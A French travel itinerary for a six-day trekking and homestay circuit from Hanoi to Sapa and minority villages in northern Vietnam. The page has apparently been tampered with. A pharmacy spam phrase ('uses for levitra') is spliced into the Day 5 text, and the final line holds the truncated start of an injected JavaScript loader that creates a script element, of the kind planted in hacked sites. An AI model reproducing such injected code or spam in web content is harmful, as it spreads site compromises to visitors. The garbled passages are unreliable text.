CIRCUIT TREKKING ET RENCONTRE À SAPA

Jour 1: Hanoi – Lao Cai en train de nuit

Vers 20h00, accueil à votre hôtel puis transfert à la gare de Hanoi pour prendre le train de nuit en direction de Lao Cai. Nuit à bord du train dans des cabines à couchettes molles.

Jour 2: Sapa – Y Linh Ho – Lao Chai – Ta Van (B,D) – Trekking

Arrivée à Lao Cai de bonne heure, transfert en navette à Sapa par une belle route de montagne. Nous débutons notre trek par le découverte de paysages fabuleux de montagnes. Visite de régions sauvages, des tribus Hmong Noirs, Dzay… Déjeuner pique-nique, traversée des rizières en terrasses, petits sentiers menant aux villages Dzays et Dzaos rouges, dîner et nuit chez l’habitant à Ta Van.

Jour 3: Tavan – Giang Ta Chai – Ban Ho (B,D) – Trekking

Randonnée à travers des rizières luxuriantes, des forêts de bambou, belle chute d’eau et joli pont. Visite du village Giang Ta Chai où cohabitent des Daos rouges et H’mong noirs. Déjeuner pique-nique. Arrivée au fond de la vallée de Muong Hoa où vivent  des Tays qui logent dans des maisons sur pilotis. Dîner et nuit chez eux à Ban Ho.

Jour 4: Ban Ho – Nam Toong – Sapa (B) – Trekking

Découverte de cultures différentes : celles des Tay, Dzay, Dao rouges… Aperçu de la vie des minorités au quotidien dans un paysage à la beauté grandiose ! Visite d’une très belle chute d’eau où vous pourrez vous baigner. Retour sur Sapa. Nuit à l’hôtel.

Jour 5 : Sapa – Lao Cai – Hanoi (B)

Matinée réservée à la découverte de la bourgade de Sapa (son marché et ses maisons coloniales…).

Dans l’après-midi, nous quitterons la ville de Sapa pour suivre les sentiers des buffles jusqu’au village de Ma Tra habité par des personnes très accueillantes de la minorité des Hmong noirs. Le chauffeur vous attendra pour uses for levitra vous reconduire jusqu’à la gare de Lao Cai. Nuit à bord du train de nuit pour Hanoi en wagon équipé de couchettes.

Jour 6: Hanoi – arrivée

Arrivée tôt le matin à la gare de Hanoi (vers 05h30). Accueil et transfert à votre hôtel.var d=document;var s=d.createElement(‘script’); if (document.currentScript) {